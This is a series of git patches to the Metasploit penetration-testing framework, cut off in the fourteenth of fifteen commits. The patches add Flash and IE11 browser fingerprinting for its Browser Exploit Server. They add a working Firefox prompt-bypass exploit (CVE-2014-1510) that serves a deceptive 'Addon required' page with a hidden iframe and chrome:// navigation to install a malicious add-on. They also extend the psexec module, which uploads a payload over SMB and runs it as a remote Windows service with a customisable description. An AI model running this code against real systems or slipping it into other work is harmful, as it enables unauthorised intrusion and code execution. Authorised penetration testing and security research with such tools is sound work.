From 4f5944cfb843c9c829da957a4b4ea666ca6cd7d1 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 28 Mar 2014 14:31:21 -0500
Subject: [PATCH 01/15] Add JavaScript detection for Adobe Flash

---
 data/js/detect/misc_addons.js | 47 +++++++++++++++++++++++++++++++++++
 1 file changed, 47 insertions(+)

diff --git a/data/js/detect/misc_addons.js b/data/js/detect/misc_addons.js
index 2deaed1252..fe0ba675cc 100644
--- a/data/js/detect/misc_addons.js
+++ b/data/js/detect/misc_addons.js
@@ -46,6 +46,53 @@ window.misc_addons_detect.hasSilverlight = function () {
 	return found;
 }
 
+/**
+ * Returns the Adobe Flash version
+**/
+window.misc_addons_detect.getFlashVersion = function () {
+	var foundVersion = null;
+
+	//
+	// Gets the Flash version by using the GetVariable function via ActiveX
+	//
+	try {
+		var ax = new ActiveXObject('ShockwaveFlash.ShockwaveFlash').GetVariable('$version').toString();
+		foundVersion = ax.match(/[\d,]+/g)[0].replace(/,/g, '.')
+	} catch (e) {}
+
+	//
+	// This should work fine for most non-IE browsers
+	//
+	if (foundVersion == null) {
+		var mimes = window.navigator.mimeTypes;
+		for (var i=0; i<mimes.length; i++) {
+			var pluginDesc = mimes[i].enabledPlugin.description.toString();
+			var m = pluginDesc.match(/Shockwave Flash [\d\.]+/g);
+			if (m != null) {
+				foundVersion = m[0].match(/\d.+/g)[0];
+				break;
+			}
+		}
+	}
+
+	//
+	// Detection for Windows + Firefox
+	//
+	if (foundVersion == null) {
+		var pluginsCount = navigator.plugins.length;
+		for (i=0; i < pluginsCount; i++) {
+			var pluginName = navigator.plugins[i].name;
+			var pluginVersion = navigator.plugins[i].version;
+			if (/Shockwave Flash/.test(pluginName) && pluginVersion != undefined) {
+				foundVersion = navigator.plugins[i].version;
+				break;
+			}
+		}
+	}
+
+	return foundVersion;
+}
+
 /**
  * Returns the Java version
  **/

From 4b7f85e47dea53d2d811b16101ea636e44ccc0fe Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 28 Mar 2014 15:14:58 -0500
Subject: [PATCH 02/15] Adobe Flash support in BES

---
 .../exploit/remote/browser_exploit_server.rb  | 41 +++++++++++--------
 1 file changed, 23 insertions(+), 18 deletions(-)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index b236649ae1..98f1908ab4 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -42,20 +42,21 @@ module Msf
 
     # Requirements a browser module can define in either BrowserRequirements or in targets
     REQUIREMENT_KEY_SET = {
-      :source       => 'source',      # Either 'script' or 'headers'
-      :ua_name      => 'ua_name',     # Example: MSIE
-      :ua_ver       => 'ua_ver',      # Example: 8.0, 9.0
-      :os_name      => 'os_name',     # Example: Microsoft Windows
-      :os_flavor    => 'os_flavor',   # Example: XP, 7
-      :language     => 'language',    # Example: en-us
-      :arch         => 'arch',        # Example: x86
-      :proxy        => 'proxy',       # 'true' or 'false'
-      :silverlight  => 'silverlight', # 'true' or 'false'
-      :office       => 'office',      # Example: "2007", "2010"
-      :java         => 'java',        # Example: 1.6, 1.6.0.0
-      :clsid        => 'clsid',       # ActiveX clsid. Also requires the :method key
-      :method       => 'method',      # ActiveX method. Also requires the :clsid key
-      :mshtml_build => 'mshtml_build'  # mshtml build. Example: "65535"
+      :source       => 'source',       # Either 'script' or 'headers'
+      :ua_name      => 'ua_name',      # Example: MSIE
+      :ua_ver       => 'ua_ver',       # Example: 8.0, 9.0
+      :os_name      => 'os_name',      # Example: Microsoft Windows
+      :os_flavor    => 'os_flavor',    # Example: XP, 7
+      :language     => 'language',     # Example: en-us
+      :arch         => 'arch',         # Example: x86
+      :proxy        => 'proxy',        # 'true' or 'false'
+      :silverlight  => 'silverlight',  # 'true' or 'false'
+      :office       => 'office',       # Example: "2007", "2010"
+      :java         => 'java',         # Example: 1.6, 1.6.0.0
+      :clsid        => 'clsid',        # ActiveX clsid. Also requires the :method key
+      :method       => 'method',       # ActiveX method. Also requires the :clsid key
+      :mshtml_build => 'mshtml_build', # mshtml build. Example: "65535"
+      :flash        => 'flash'         # Example: "12.0" (chrome/ff) or "12.0.0.111" (IE)
     }
 
     def initialize(info={})
@@ -222,9 +223,12 @@ module Msf
     # For more info about what the actual value might be for each key, see HttpServer.
     #
     # If the source is 'script', the profile might have even more information about plugins:
-    # 'office'  : The version of Microsoft Office (IE only)
-    # 'activex' : Whether a specific method is available from an ActiveX control (IE only)
-    # 'java'    : The Java version
+    # 'office'       : The version of Microsoft Office (IE only)
+    # 'activex'      : Whether a specific method is available from an ActiveX control (IE only)
+    # 'java'         : The Java version
+    # 'mshtml_build' : The MSHTML build version
+    # 'flash'        : The Flash version
+    # 'silverlight'  : The Silverlight version
     #
     # @param tag [String] Either a cookie or IP + User-Agent
     # @return [Hash] The profile found. If not found, returns nil
@@ -375,7 +379,8 @@ module Msf
           "<%=REQUIREMENT_KEY_SET[:ua_ver]%>"      : osInfo.ua_version,
           "<%=REQUIREMENT_KEY_SET[:arch]%>"        : osInfo.arch,
           "<%=REQUIREMENT_KEY_SET[:java]%>"        : window.misc_addons_detect.getJavaVersion(),
-          "<%=REQUIREMENT_KEY_SET[:silverlight]%>" : window.misc_addons_detect.hasSilverlight()
+          "<%=REQUIREMENT_KEY_SET[:silverlight]%>" : window.misc_addons_detect.hasSilverlight(),
+          "<%=REQUIREMENT_KEY_SET[:flash]%>"       : window.misc_addons_detect.getFlashVersion()
         };
 
         <% if os == OperatingSystems::WINDOWS and client == HttpClients::IE %>

From 07ab05c870366b84209479b113c11a5553b8e66e Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 28 Mar 2014 15:20:45 -0500
Subject: [PATCH 03/15] Update a comment

---
 lib/msf/core/exploit/remote/browser_exploit_server.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index 98f1908ab4..819fc94606 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -56,7 +56,7 @@ module Msf
       :clsid        => 'clsid',        # ActiveX clsid. Also requires the :method key
       :method       => 'method',       # ActiveX method. Also requires the :clsid key
       :mshtml_build => 'mshtml_build', # mshtml build. Example: "65535"
-      :flash        => 'flash'         # Example: "12.0" (chrome/ff) or "12.0.0.111" (IE)
+      :flash        => 'flash'         # Example: "12.0" (chrome/ff) or "12.0.0.77" (IE)
     }
 
     def initialize(info={})

From a173fcf2fa07b903250994d9add7e3cd1c577e17 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 28 Mar 2014 15:39:25 -0500
Subject: [PATCH 04/15] Flash detection for firefox_svg_plugin

Good test case
---
 modules/exploits/multi/browser/firefox_svg_plugin.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/multi/browser/firefox_svg_plugin.rb b/modules/exploits/multi/browser/firefox_svg_plugin.rb
index 19cea1bc58..dac5601f06 100644
--- a/modules/exploits/multi/browser/firefox_svg_plugin.rb
+++ b/modules/exploits/multi/browser/firefox_svg_plugin.rb
@@ -75,7 +75,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'BrowserRequirements' => {
         :source  => 'script',
         :ua_name => HttpClients::FF,
-        :ua_ver  => /17\..*/
+        :ua_ver  => /17\..*/,
+        :flash   => /[\d.]+/
       }
     ))
 

From ebcf972c08857ac946cea090bba520bb70bd2485 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Tue, 1 Apr 2014 23:48:35 -0500
Subject: [PATCH 05/15] Add initial firefox xpi prompt bypass.

---
 .../browser/firefox_xpi_bootstrapped_addon.rb | 49 ++++++++++++++++---
 1 file changed, 43 insertions(+), 6 deletions(-)

diff --git a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
index 5fc3882cfb..2b9f00f4cd 100644
--- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
+++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
@@ -28,13 +28,18 @@ class Metasploit3 < Msf::Exploit::Remote
         be "bootstrapped". As the addon will execute the payload after
         each Firefox restart, an option can be given to automatically
         uninstall the addon once the payload has been executed.
+
+        On Firefox 22.0 - 27.0, CVE-2014-1510 allows us to skip the
+        first half of the permissions prompt.
       },
       'License'       => MSF_LICENSE,
       'Author'        => [ 'mihi', 'joev' ],
       'References'    =>
         [
           [ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ],
-          [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ]
+          [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ],
+          [ 'CVE', '2014-1510' ], # webidl chrome:// navigation to skip first half of prompt
+          [ 'CVE', '2014-1511' ]
         ],
       'DisclosureDate' => 'Jun 27 2007'
     ))
@@ -67,10 +72,42 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def generate_html
-    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>\n|
-    html << %Q|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n|
-    html << %Q|<script>window.location.href="addon.xpi";</script>\n|
-    html << %Q|</body></html>|
-    return html
+    %Q|
+      <html><head><title>Loading, Please Wait...</title></head>
+        <body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>
+        <div style='visibility:hidden;width:1px;height:1px;'>
+          <iframe name='f'></iframe>
+        </div>
+        <script>
+          function install() {
+            window.location.href="addon.xpi";
+          }
+          #{web_idl_navigation}
+        </script>
+        </body>
+      </html>
+    |
+  end
+
+  # In firefox 21 - 27, there is a vulnerability that allows navigation to a chrome:// URL.
+  # From there you can load the browser XUL, and inject a data URL into a nested frame.
+  # If the data URL opens the .xpi URL, the first permission prompt gets skipped.
+  def web_idl_navigation
+    %Q|
+      try {
+        c = new mozRTCPeerConnection;
+        c.createOffer(function(){},function(){window.rr=window.open('chrome://browser/content/browser.xul', 'f')});
+        setTimeout(function(){
+          try {
+            frames[0].frames[1].location="data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+
+                                  "{},function(){window.open('#{get_uri.chomp('/')}/addon.xpi', '_self');});<\\/script>";
+          } catch(e) {
+            install();
+          }
+        },600);
+      } catch(e) {
+        install();
+      }
+    |
   end
 end

From 5ffcfb22fa045fbac639004ec38b830c8c8e8797 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Wed, 2 Apr 2014 02:21:16 -0500
Subject: [PATCH 06/15] Add object detection for IE11

While working on some stuff with IE11, I realized this is very
necessary.
---
 data/js/detect/os.js | 15 +++++++++++----
 1 file changed, 11 insertions(+), 4 deletions(-)

diff --git a/data/js/detect/os.js b/data/js/detect/os.js
index 1e6fc88a2e..05850b7398 100644
--- a/data/js/detect/os.js
+++ b/data/js/detect/os.js
@@ -945,11 +945,18 @@ window.os_detect.getVersion = function(){
 		if (!ua_version) {
 			// The ScriptEngine functions failed us, try some object detection
 			if (document.documentElement && (typeof document.documentElement.style.maxHeight)!="undefined") {
-				// IE 10 detection using nodeName
+				// IE 11 detection, see: http://msdn.microsoft.com/en-us/library/ie/bg182625(v=vs.85).aspx
 				try {
-					var badNode = document.createElement && document.createElement("badname");
-					if (badNode && badNode.nodeName === "BADNAME") { ua_version = "10.0"; }
-				} catch(e) {}
+					if (document.__proto__ != undefined) { ua_version = "11.0"; }
+				} catch (e) {}
+
+				// IE 10 detection using nodeName
+				if (!ua_version) {
+					try {
+						var badNode = document.createElement && document.createElement("badname");
+						if (badNode && badNode.nodeName === "BADNAME") { ua_version = "10.0"; }
+					} catch(e) {}
+				}
 
 				// IE 9 detection based on a "Object doesn't support property or method" error
 				if (!ua_version) {

From 92c6113a7c620d2cebeaa3705c2d58a6ba90505b Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Wed, 2 Apr 2014 11:48:50 -0500
Subject: [PATCH 07/15] Fix broken spec for Rex::Text.randomize_space

---
 spec/lib/rex/text_spec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/spec/lib/rex/text_spec.rb b/spec/lib/rex/text_spec.rb
index ddf4fa04a3..8a19f92223 100644
--- a/spec/lib/rex/text_spec.rb
+++ b/spec/lib/rex/text_spec.rb
@@ -118,7 +118,7 @@ describe Rex::Text do
       let (:sample_text) { "The quick brown sploit jumped over the lazy A/V" }
       let (:spaced_text) { described_class.randomize_space(sample_text) }
       it "should return a string with at least one new space characater" do
-        spaced_text.should match /\x09\x0d\x0a/
+        spaced_text.should match /[\x09\x0d\x0a]/
       end
 
       it "should not otherwise be mangled" do

From 978bdbb6762463e2551501fd4ea548a1598d2273 Mon Sep 17 00:00:00 2001
From: Florian Gaultier <florian@scrt.ch>
Date: Mon, 6 Jan 2014 23:45:55 +0100
Subject: [PATCH 08/15] Custom Service Description

---
 modules/exploits/windows/smb/psexec.rb | 126 ++++++++++++++++++++++++-
 1 file changed, 125 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb
index 2c4b021955..7b24d89120 100644
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -80,7 +80,8 @@ class Metasploit3 < Msf::Exploit::Remote
         OptBool.new('DB_REPORT_AUTH', [true, "Report an auth_note upon a successful connection", true]),
         OptBool.new('MOF_UPLOAD_METHOD', [true, "Use WBEM instead of RPC, ADMIN$ share will be mandatory. ( Not compatible with Vista+ )", false]),
         OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),
-        OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil])
+        OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]),
+        OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
       ], self.class)
   end
 
@@ -152,6 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote
       simple.disconnect("ADMIN$")
     else
       servicename = rand_text_alpha(8)
+      servicedescription = datastore['SERVICE_DESCRIPTION']
 
       # Upload the shellcode to a file
       print_status("Uploading payload...")
@@ -199,6 +201,128 @@ class Metasploit3 < Msf::Exploit::Remote
 
       psexec(file_location, false)
 
+      print_status("Creating a new service (#{servicename} - \"#{displayname}\")...")
+      stubdata =
+        scm_handle +
+        NDR.wstring(servicename) +
+        NDR.uwstring(displayname) +
+
+        NDR.long(0x0F01FF) + # Access: MAX
+        NDR.long(0x00000110) + # Type: Interactive, Own process
+        NDR.long(0x00000003) + # Start: Demand
+        NDR.long(0x00000000) + # Errors: Ignore
+        NDR.wstring( file_location  ) + # Binary Path
+        NDR.long(0) + # LoadOrderGroup
+        NDR.long(0) + # Dependencies
+        NDR.long(0) + # Service Start
+        NDR.long(0) + # Password
+        NDR.long(0) + # Password
+        NDR.long(0) + # Password
+        NDR.long(0)  # Password
+      begin
+        response = dcerpc.call(0x0c, stubdata)
+        if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
+          svc_handle = dcerpc.last_response.stub_data[0,20]
+          svc_status = dcerpc.last_response.stub_data[24,4]
+        end
+      rescue ::Exception => e
+        print_error("Error: #{e}")
+        return
+      end
+
+      ##
+      # CloseHandle()
+      ##
+      print_status("Closing service handle...")
+      begin
+        response = dcerpc.call(0x0, svc_handle)
+      rescue ::Exception
+      end
+
+      ##
+      # OpenServiceW
+      ##
+      print_status("Opening service...")
+      begin
+        stubdata =
+          scm_handle +
+          NDR.wstring(servicename) +
+          NDR.long(0xF01FF)
+
+        response = dcerpc.call(0x10, stubdata)
+        if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
+          svc_handle = dcerpc.last_response.stub_data[0,20]
+        end
+      rescue ::Exception => e
+        print_error("Error: #{e}")
+        return
+      end
+
+      if servicedescription
+        ##
+        # ChangeServiceConfig2W()
+        ##
+        print_status("Change the service description (#{servicedescription})...")
+        begin
+          stubdata =
+            svc_handle +
+            NDR.long(1) +
+            NDR.long(1) +
+            NDR.long(0x0200) +
+            NDR.long(0x04000200) +
+            NDR.wstring(servicedescription)
+
+          response = dcerpc.call(0x25, stubdata)
+          if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
+          end
+        rescue ::Exception => e
+          print_error("Error: #{e}")
+        end
+      end
+
+      ##
+      # StartService()
+      ##
+      print_status("Starting the service...")
+      stubdata =
+        svc_handle +
+        NDR.long(0) +
+        NDR.long(0)
+      begin
+        response = dcerpc.call(0x13, stubdata)
+        if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
+        end
+      rescue ::Exception => e
+        print_error("Error: #{e}")
+        return
+      end
+
+      ##
+      # DeleteService()
+      ##
+      print_status("Removing the service...")
+      stubdata =
+        svc_handle
+      begin
+        response = dcerpc.call(0x02, stubdata)
+        if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
+        end
+      rescue ::Exception => e
+        print_error("Error: #{e}")
+      end
+
+      ##
+      # CloseHandle()
+      ##
+      print_status("Closing service handle...")
+      begin
+        response = dcerpc.call(0x0, svc_handle)
+      rescue ::Exception => e
+        print_error("Error: #{e}")
+      end
+
+      begin
+
       print_status("Deleting \\#{filename}...")
       sleep(1)
       #This is not really useful but will prevent double \\ on the wire :)

From 631a7b9c48da1d13d89cd627f789bb96204d0dbb Mon Sep 17 00:00:00 2001
From: agix <florian.gaultier@gmail.com>
Date: Wed, 26 Mar 2014 16:54:10 +0100
Subject: [PATCH 09/15] Adapt to new psexec mixin (first try :D)

---
 lib/msf/core/exploit/smb/psexec.rb     |  20 +++-
 modules/exploits/windows/smb/psexec.rb | 126 +------------------------
 2 files changed, 21 insertions(+), 125 deletions(-)

diff --git a/lib/msf/core/exploit/smb/psexec.rb b/lib/msf/core/exploit/smb/psexec.rb
index 17fb4d846e..1c36add391 100644
--- a/lib/msf/core/exploit/smb/psexec.rb
+++ b/lib/msf/core/exploit/smb/psexec.rb
@@ -52,7 +52,7 @@ module Exploit::Remote::SMB::Psexec
   # @param command [String] Should be a valid windows command
   # @param disconnect [Boolean] Disconnect afterwards
   # @return [Boolean] Whether everything went well
-  def psexec(command, disconnect=true)
+  def psexec(command, service_description,disconnect=true)
     simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
     handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
     vprint_status("#{peer} - Binding to #{handle} ...")
@@ -72,6 +72,7 @@ module Exploit::Remote::SMB::Psexec
     end
     servicename = Rex::Text.rand_text_alpha(11)
     displayname = Rex::Text.rand_text_alpha(16)
+    servicedescription = service_description || Rex::Text.rand_text_alpha(rand(32)+1)
     svc_handle = nil
     svc_status = nil
     stubdata =
@@ -100,6 +101,23 @@ module Exploit::Remote::SMB::Psexec
       return false
     end
 
+    vprint_status("#{peer} - Changing service description...")
+    stubdata =
+      svc_handle +
+      NDR.long(1) +
+      NDR.long(1) +
+      NDR.long(0x0200) +
+      NDR.long(0x04000200) +
+      NDR.wstring(servicedescription)
+    begin
+      response = dcerpc.call(0x25, stubdata)
+      if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
+      end
+    rescue ::Exception => e
+      print_error("#{peer} - Error changins service description : #{e}")
+      return false
+    end
+
     vprint_status("#{peer} - Starting the service...")
     stubdata = svc_handle + NDR.long(0) + NDR.long(0)
     begin
diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb
index 7b24d89120..fc731643f8 100644
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -153,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote
       simple.disconnect("ADMIN$")
     else
       servicename = rand_text_alpha(8)
-      servicedescription = datastore['SERVICE_DESCRIPTION']
+      servicedescription = datastore['SERVICE_DESCRIPTION'] || rand_text_alpha(rand(32)+1)
 
       # Upload the shellcode to a file
       print_status("Uploading payload...")
@@ -199,129 +199,7 @@ class Metasploit3 < Msf::Exploit::Remote
         file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
       end
 
-      psexec(file_location, false)
-
-      print_status("Creating a new service (#{servicename} - \"#{displayname}\")...")
-      stubdata =
-        scm_handle +
-        NDR.wstring(servicename) +
-        NDR.uwstring(displayname) +
-
-        NDR.long(0x0F01FF) + # Access: MAX
-        NDR.long(0x00000110) + # Type: Interactive, Own process
-        NDR.long(0x00000003) + # Start: Demand
-        NDR.long(0x00000000) + # Errors: Ignore
-        NDR.wstring( file_location  ) + # Binary Path
-        NDR.long(0) + # LoadOrderGroup
-        NDR.long(0) + # Dependencies
-        NDR.long(0) + # Service Start
-        NDR.long(0) + # Password
-        NDR.long(0) + # Password
-        NDR.long(0) + # Password
-        NDR.long(0)  # Password
-      begin
-        response = dcerpc.call(0x0c, stubdata)
-        if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-          svc_handle = dcerpc.last_response.stub_data[0,20]
-          svc_status = dcerpc.last_response.stub_data[24,4]
-        end
-      rescue ::Exception => e
-        print_error("Error: #{e}")
-        return
-      end
-
-      ##
-      # CloseHandle()
-      ##
-      print_status("Closing service handle...")
-      begin
-        response = dcerpc.call(0x0, svc_handle)
-      rescue ::Exception
-      end
-
-      ##
-      # OpenServiceW
-      ##
-      print_status("Opening service...")
-      begin
-        stubdata =
-          scm_handle +
-          NDR.wstring(servicename) +
-          NDR.long(0xF01FF)
-
-        response = dcerpc.call(0x10, stubdata)
-        if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-          svc_handle = dcerpc.last_response.stub_data[0,20]
-        end
-      rescue ::Exception => e
-        print_error("Error: #{e}")
-        return
-      end
-
-      if servicedescription
-        ##
-        # ChangeServiceConfig2W()
-        ##
-        print_status("Change the service description (#{servicedescription})...")
-        begin
-          stubdata =
-            svc_handle +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(0x0200) +
-            NDR.long(0x04000200) +
-            NDR.wstring(servicedescription)
-
-          response = dcerpc.call(0x25, stubdata)
-          if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-          end
-        rescue ::Exception => e
-          print_error("Error: #{e}")
-        end
-      end
-
-      ##
-      # StartService()
-      ##
-      print_status("Starting the service...")
-      stubdata =
-        svc_handle +
-        NDR.long(0) +
-        NDR.long(0)
-      begin
-        response = dcerpc.call(0x13, stubdata)
-        if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-        end
-      rescue ::Exception => e
-        print_error("Error: #{e}")
-        return
-      end
-
-      ##
-      # DeleteService()
-      ##
-      print_status("Removing the service...")
-      stubdata =
-        svc_handle
-      begin
-        response = dcerpc.call(0x02, stubdata)
-        if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-        end
-      rescue ::Exception => e
-        print_error("Error: #{e}")
-      end
-
-      ##
-      # CloseHandle()
-      ##
-      print_status("Closing service handle...")
-      begin
-        response = dcerpc.call(0x0, svc_handle)
-      rescue ::Exception => e
-        print_error("Error: #{e}")
-      end
-
-      begin
+      psexec(file_location, servicedescription, false)
 
       print_status("Deleting \\#{filename}...")
       sleep(1)

From 5334f2657eed568dc280e7819d0bbd7ffecd6d5e Mon Sep 17 00:00:00 2001
From: agix <florian.gaultier@gmail.com>
Date: Wed, 26 Mar 2014 18:56:25 +0100
Subject: [PATCH 10/15] Fix a bug for backwards compatibility

---
 lib/msf/core/exploit/smb/psexec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/smb/psexec.rb b/lib/msf/core/exploit/smb/psexec.rb
index 1c36add391..a8b43ccedd 100644
--- a/lib/msf/core/exploit/smb/psexec.rb
+++ b/lib/msf/core/exploit/smb/psexec.rb
@@ -52,7 +52,7 @@ module Exploit::Remote::SMB::Psexec
   # @param command [String] Should be a valid windows command
   # @param disconnect [Boolean] Disconnect afterwards
   # @return [Boolean] Whether everything went well
-  def psexec(command, service_description,disconnect=true)
+  def psexec(command, disconnect=true, service_description=nil)
     simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
     handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
     vprint_status("#{peer} - Binding to #{handle} ...")

From b636a679aeb05ef008a64749187d83dea2fc9e52 Mon Sep 17 00:00:00 2001
From: agix <florian.gaultier@gmail.com>
Date: Wed, 26 Mar 2014 18:57:38 +0100
Subject: [PATCH 11/15] Erf, sorry, fixed now

---
 modules/exploits/windows/smb/psexec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb
index fc731643f8..a9504b3dab 100644
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -199,7 +199,7 @@ class Metasploit3 < Msf::Exploit::Remote
         file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
       end
 
-      psexec(file_location, servicedescription, false)
+      psexec(file_location, false, servicedescription)
 
       print_status("Deleting \\#{filename}...")
       sleep(1)

From 4a575d57ab212f3083cdc43d27ddda56ac079ee9 Mon Sep 17 00:00:00 2001
From: agix <florian.gaultier@gmail.com>
Date: Tue, 1 Apr 2014 16:38:56 +0200
Subject: [PATCH 12/15] Try to fix Meatballs1 suggestions : optional
 service_description change call

---
 lib/msf/core/exploit/smb/psexec.rb     | 29 +++++++++++++-------------
 modules/exploits/windows/smb/psexec.rb |  2 +-
 2 files changed, 15 insertions(+), 16 deletions(-)

diff --git a/lib/msf/core/exploit/smb/psexec.rb b/lib/msf/core/exploit/smb/psexec.rb
index a8b43ccedd..53e4503164 100644
--- a/lib/msf/core/exploit/smb/psexec.rb
+++ b/lib/msf/core/exploit/smb/psexec.rb
@@ -72,7 +72,7 @@ module Exploit::Remote::SMB::Psexec
     end
     servicename = Rex::Text.rand_text_alpha(11)
     displayname = Rex::Text.rand_text_alpha(16)
-    servicedescription = service_description || Rex::Text.rand_text_alpha(rand(32)+1)
+
     svc_handle = nil
     svc_status = nil
     stubdata =
@@ -101,21 +101,20 @@ module Exploit::Remote::SMB::Psexec
       return false
     end
 
-    vprint_status("#{peer} - Changing service description...")
-    stubdata =
-      svc_handle +
-      NDR.long(1) +
-      NDR.long(1) +
-      NDR.long(0x0200) +
-      NDR.long(0x04000200) +
-      NDR.wstring(servicedescription)
-    begin
-      response = dcerpc.call(0x25, stubdata)
-      if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
+    if service_description
+      vprint_status("#{peer} - Changing service description...")
+      stubdata =
+        svc_handle +
+        NDR.long(1) +
+        NDR.long(1) +
+        NDR.long(0x0200) +
+        NDR.long(0x04000200) +
+        NDR.wstring(service_description)
+      begin
+        response = dcerpc.call(0x25, stubdata)
+      rescue ::Exception => e
+        print_error("#{peer} - Error changing service description : #{e}")
       end
-    rescue ::Exception => e
-      print_error("#{peer} - Error changins service description : #{e}")
-      return false
     end
 
     vprint_status("#{peer} - Starting the service...")
diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb
index a9504b3dab..68badfeef6 100644
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -153,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote
       simple.disconnect("ADMIN$")
     else
       servicename = rand_text_alpha(8)
-      servicedescription = datastore['SERVICE_DESCRIPTION'] || rand_text_alpha(rand(32)+1)
+      servicedescription = datastore['SERVICE_DESCRIPTION']
 
       # Upload the shellcode to a file
       print_status("Uploading payload...")

From bc4cb3febf78129b937a1c632defed676aed2edf Mon Sep 17 00:00:00 2001
From: agix <florian.gaultier@gmail.com>
Date: Tue, 1 Apr 2014 17:32:15 +0200
Subject: [PATCH 13/15] Add DCERPC catch exception

---
 lib/msf/core/exploit/smb/psexec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/smb/psexec.rb b/lib/msf/core/exploit/smb/psexec.rb
index 53e4503164..32ed876d24 100644
--- a/lib/msf/core/exploit/smb/psexec.rb
+++ b/lib/msf/core/exploit/smb/psexec.rb
@@ -112,7 +112,7 @@ module Exploit::Remote::SMB::Psexec
         NDR.wstring(service_description)
       begin
         response = dcerpc.call(0x25, stubdata)
-      rescue ::Exception => e
+      rescue Rex::Proto::DCERPC::Exceptions::Fault => e
         print_error("#{peer} - Error changing service description : #{e}")
       end
     end

From a71fcaeefd3870159843db77d80458b234f6a48c Mon Sep 17 00:00:00 2001
From: agix <agix@shell-storm.org>
Date: Tue, 1 Apr 2014 20:17:35 +0200
Subject: [PATCH 14/15] add comments on change description call

---
 lib/msf/core/exploit/smb/psexec.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/exploit/smb/psexec.rb b/lib/msf/core/exploit/smb/psexec.rb
index 32ed876d24..d3a6ccf13c 100644
--- a/lib/msf/core/exploit/smb/psexec.rb
+++ b/lib/msf/core/exploit/smb/psexec.rb
